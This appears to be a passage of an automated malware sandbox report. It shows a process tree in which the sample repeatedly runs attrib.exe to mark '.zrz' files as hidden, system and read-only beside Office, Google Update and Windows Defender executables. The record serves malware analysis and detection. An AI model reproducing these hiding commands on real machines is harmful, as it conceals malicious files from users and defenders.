    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\GAC_32\ehexthost32\6.1.0.0__31bf3856ad364e35\ehexthost32.zrz"
        5⤵
        
        PID:2924
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\GAC_32\MSBuild\3.5.0.0__b03f5f7f11d50a3a\MSBuild.zrz"
        5⤵
        
        PID:2916
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\GAC_64\mcupdate\6.1.0.0__31bf3856ad364e35\mcupdate.zrz"
        5⤵
        
        PID:1536
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\GAC_64\MSBuild\3.5.0.0__b03f5f7f11d50a3a\MSBuild.zrz"
        5⤵
        
        PID:1492
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\GAC_MSIL\ComSvcConfig\3.0.0.0__b03f5f7f11d50a3a\ComSvcConfig.zrz"
        5⤵
        Views/modifies file attributes
        
        PID:2768
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\GAC_MSIL\dfsvc\2.0.0.0__b03f5f7f11d50a3a\dfsvc.zrz"
        5⤵
        Views/modifies file attributes
        
        PID:1080
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\GAC_MSIL\loadmxf\6.1.0.0__31bf3856ad364e35\loadmxf.zrz"
        5⤵
        
        PID:2392
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\GAC_MSIL\ehexthost\6.1.0.0__31bf3856ad364e35\ehexthost.zrz"
        5⤵
        
        PID:2376
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\GAC_MSIL\Narrator\6.1.0.0__31bf3856ad364e35\Narrator.zrz"
        5⤵
        
        PID:3040
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\GAC_MSIL\PresentationFontCache\3.0.0.0__31bf3856ad364e35\PresentationFontCache.zrz"
        5⤵
        
        PID:2968
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\GAC_MSIL\SMSvcHost\3.0.0.0__b03f5f7f11d50a3a\SMSvcHost.zrz"
        5⤵
        
        PID:2312
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\GAC_MSIL\WsatConfig\3.0.0.0__b03f5f7f11d50a3a\WsatConfig.zrz"
        5⤵
        
        PID:968
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v2.0.50727_32\ComSvcConfig\5f1a06c0108b2c81cde1dc491d74043d\ComSvcConfig.ni.zrz"
        5⤵
        Views/modifies file attributes
        
        PID:2672
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v2.0.50727_32\dfsvc\2c3e7fda8de40e45e7f5e004094dc7c9\dfsvc.ni.zrz"
        5⤵
        
        PID:1560
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v2.0.50727_32\ehExtHost32\c899de3549784161aa66610d5735e4f0\ehExtHost32.ni.zrz"
        5⤵
        
        PID:1060
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v2.0.50727_32\MSBuild\af28543d9b3e7d9f110448ecce53cd72\MSBuild.ni.zrz"
        5⤵
        
        PID:656
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v2.0.50727_32\Narrator\0bae62c3fc6c327ed24989263988173d\Narrator.ni.zrz"
        5⤵
        
        PID:2112
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v2.0.50727_32\PresentationFontCac#\b3ade8d5c0d4bb5d4940bcafd3453642\PresentationFontCache.ni.zrz"
        5⤵
        
        PID:2768
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v2.0.50727_32\SMSvcHost\1bc1ee3c3aa45d28dcf4657bceb2fcb4\SMSvcHost.ni.zrz"
        5⤵
        
        PID:1344
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v2.0.50727_32\WsatConfig\96a8bdafba9f9d3e33cd974bfaa67e58\WsatConfig.ni.zrz"
        5⤵
        
        PID:984
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v2.0.50727_64\ComSvcConfig\d632b7434f821829827657e23ac98589\ComSvcConfig.ni.zrz"
        5⤵
        
        PID:2856
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v2.0.50727_64\dfsvc\9bc0d921859b039d6e9f642148333949\dfsvc.ni.zrz"
        5⤵
        Views/modifies file attributes
        
        PID:2452
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v2.0.50727_64\ehExtHost\ad37b6e3a1cb1081592f1c5797ae9dad\ehExtHost.ni.zrz"
        5⤵
        
        PID:1748
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v2.0.50727_64\LoadMxf\d09b54cd68bc772b3be3832926e940d4\LoadMxf.ni.zrz"
        5⤵
        Sets file to hidden
        
        PID:808
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v2.0.50727_64\mcupdate\f30beba36940b5a2b55a32ea7f42d694\mcupdate.ni.zrz"
        5⤵
        
        PID:2968
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v2.0.50727_64\MSBuild\1a154709cdfe214029ea88c51ab2b579\MSBuild.ni.zrz"
        5⤵
        Sets file to hidden
        
        PID:1200
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v2.0.50727_64\Narrator\4cc02fad33053737088d4c18267ca0a0\Narrator.ni.zrz"
        5⤵
        
        PID:1752
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v2.0.50727_64\PresentationFontCac#\0246845f487e5f33d3564eff578665a3\PresentationFontCache.ni.zrz"
        5⤵
        
        PID:2824
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\ConvertInkStore.zrz"
      4⤵
      PID:556
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\InputPersonalization.zrz"
      4⤵
      PID:1636
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\InkWatson.zrz"
      4⤵
      PID:1452
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\FlickLearningWizard.zrz"
      4⤵
      PID:744
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\mip.zrz"
      4⤵
      PID:2308
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.zrz"
      4⤵
      PID:1508
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\TabTip.zrz"
      4⤵
      PID:1656
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\MSInfo\msinfo32.zrz"
      4⤵
      PID:2916
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\DVD Maker\DVDMaker.zrz"
      4⤵
      PID:2040
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\iediagcmd.zrz"
      4⤵
      Views/modifies file attributes
      PID:2388
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\ieinstal.zrz"
      4⤵
      PID:328
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\iexplore.zrz"
      4⤵
      PID:2496
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\ielowutil.zrz"
      4⤵
      PID:2880
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Defender\MpCmdRun.zrz"
      4⤵
      PID:1188
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Defender\MSASCui.zrz"
      4⤵
      PID:1536
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Journal\Journal.zrz"
      4⤵
      PID:2428
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Journal\PDIALOG.zrz"
      4⤵
      PID:2628
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Mail\wab.zrz"
      4⤵
      PID:2216
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Mail\wabmig.zrz"
      4⤵
      PID:2500
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Mail\WinMail.zrz"
      4⤵
      PID:432
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\setup_wm.zrz"
      4⤵
      PID:1568
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmlaunch.zrz"
      4⤵
      PID:548
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpconfig.zrz"
      4⤵
      PID:1876
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\WMPDMC.zrz"
      4⤵
      PID:1892
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpenc.zrz"
      4⤵
      PID:1756
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmplayer.zrz"
      4⤵
      PID:1880
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpnetwk.zrz"
      4⤵
      PID:1944
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpnscfg.zrz"
      4⤵
      PID:1548
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmprph.zrz"
      4⤵
      PID:2020
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpshare.zrz"
      4⤵
      PID:2072
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\WMPSideShowGadget.zrz"
      4⤵
      PID:2452
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows NT\Accessories\wordpad.zrz"
      4⤵
      PID:2024
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Photo Viewer\ImagingDevices.zrz"
      4⤵
      PID:1748
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Sidebar\sidebar.zrz"
      4⤵
      PID:3040
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.zrz"
      4⤵
      PID:2304
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.zrz"
      4⤵
      PID:2968
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\EQUATION\EQNEDT32.zrz"
      4⤵
      PID:2184
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\ink\mip.zrz"
      4⤵
      PID:2964
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\ink\pipanel.zrz"
      4⤵
      PID:3052
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\ink\TabTip32.zrz"
      4⤵
      PID:3060
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.zrz"
      4⤵
      PID:1156
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\ODeploy.zrz"
      4⤵
      PID:2688
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Setup.zrz"
      4⤵
      PID:1428
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\FLTLDR.zrz"
      4⤵
      PID:2824
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\LICLUA.zrz"
      4⤵
      PID:572
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSOICONS.zrz"
      4⤵
      PID:472
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSOXMLED.zrz"
      4⤵
      PID:560
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Oarpmany.zrz"
      4⤵
      PID:2756
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\SmartTagInstall.zrz"
      4⤵
      PID:2672
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPREARM.zrz"
      4⤵
      PID:2680
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.zrz"
      4⤵
      Views/modifies file attributes
      PID:1508
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\TextConv\WksConv\Wkconv.zrz"
      4⤵
      PID:2896
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\x86\vsta_ep32.zrz"
      4⤵
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:1448
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.zrz"
      4⤵
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:1776
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleCrashHandler.zrz"
      4⤵
      Drops file in Program Files directory
      PID:2188
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleCrashHandler64.zrz"
      4⤵
      PID:156
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdate.zrz"
      4⤵
      PID:2196
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateBroker.zrz"
      4⤵
      Drops file in Program Files directory
      PID:2004
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateComRegisterShell64.zrz"
      4⤵
      Views/modifies file attributes
      PID:2620
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.zrz"
      4⤵
      PID:2224
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateOnDemand.zrz"
      4⤵
      PID:1080
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateSetup.zrz"
      4⤵
      Drops file in Program Files directory
      PID:2500
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\106.0.5249.119\chrome_installer.zrz"
      4⤵
      Views/modifies file attributes
      PID:936
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Google\Update\Install\{B6496849-25C8-4989-A95B-CAC74FC1315F}\chrome_installer.zrz"
      4⤵
      Views/modifies file attributes
      PID:1528
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Google\Update\DisabledGoogleUpdate.zrz"
      4⤵
      PID:388
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Internet Explorer\ExtExport.zrz"
      4⤵
      PID:1416
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Internet Explorer\ieinstal.zrz"
      4⤵
      PID:1948
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Internet Explorer\ielowutil.zrz"
      4⤵
      PID:2112
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Internet Explorer\iexplore.zrz"
      4⤵
      PID:1880
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\1033\ONELEV.zrz"
      4⤵
      PID:2484
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\ACCICONS.zrz"
      4⤵
      PID:1008
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.zrz"
      4⤵
      PID:2572
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\CLVIEW.zrz"
      4⤵
      Drops file in Program Files directory
      PID:1740
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\CNFNOT32.zrz"
      4⤵
      Sets file to hidden
      PID:3036
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.zrz"
      4⤵
      PID:1356
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.zrz"
      4⤵
      PID:1984
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\GRAPH.zrz"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2468
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.zrz"
      4⤵
      PID:3056
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\GROOVEMN.zrz"
      4⤵
      PID:3052
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\IEContentService.zrz"
      4⤵
      PID:1340
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\MSACCESS.zrz"
      4⤵
      PID:2328
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.zrz"
      4⤵
      PID:556
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\misc.zrz"
      4⤵
      PID:1592
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\INFOPATH.zrz"
      4⤵
      PID:1688
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.zrz"
      4⤵
      PID:1452
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.zrz"
      4⤵
      PID:2180
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\MSOUC.zrz"
      4⤵
      PID:1004
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\MSQRY32.zrz"
      4⤵
      PID:2204
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\MSTORDB.zrz"
      4⤵
      PID:2792
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\MSTORE.zrz"
      4⤵
      PID:2620
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\OIS.zrz"
      4⤵
      PID:2224
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\ONENOTE.zrz"
      4⤵
      PID:340
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\NAMECONTROLSERVER.zrz"
      4⤵
      Sets file to hidden
      PID:656
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.zrz"
      4⤵
      Drops file in Program Files directory
      PID:1344
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.zrz"
      4⤵
      PID:1312
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.zrz"
      4⤵
      PID:288
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\PPTICO.zrz"
      4⤵
      PID:1608
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\SCANPST.zrz"
      4⤵
      Views/modifies file attributes
      PID:2980
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\SETLANG.zrz"
      4⤵
      PID:2956
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\SELFCERT.zrz"
      4⤵
      PID:2444
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\ConvertInkStore.zrz"
    3⤵
    PID:2824
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\InkWatson.zrz"
    3⤵
    PID:2704
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\FlickLearningWizard.zrz"
    3⤵
    - Sets file to hidden
    PID:2812
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\InputPersonalization.zrz"
    3⤵
    PID:556
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\mip.zrz"
    3⤵
    PID:472
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.zrz"
    3⤵
    PID:1636
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\TabTip.zrz"
    3⤵
    PID:736
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\MSInfo\msinfo32.zrz"
    3⤵
    PID:2232
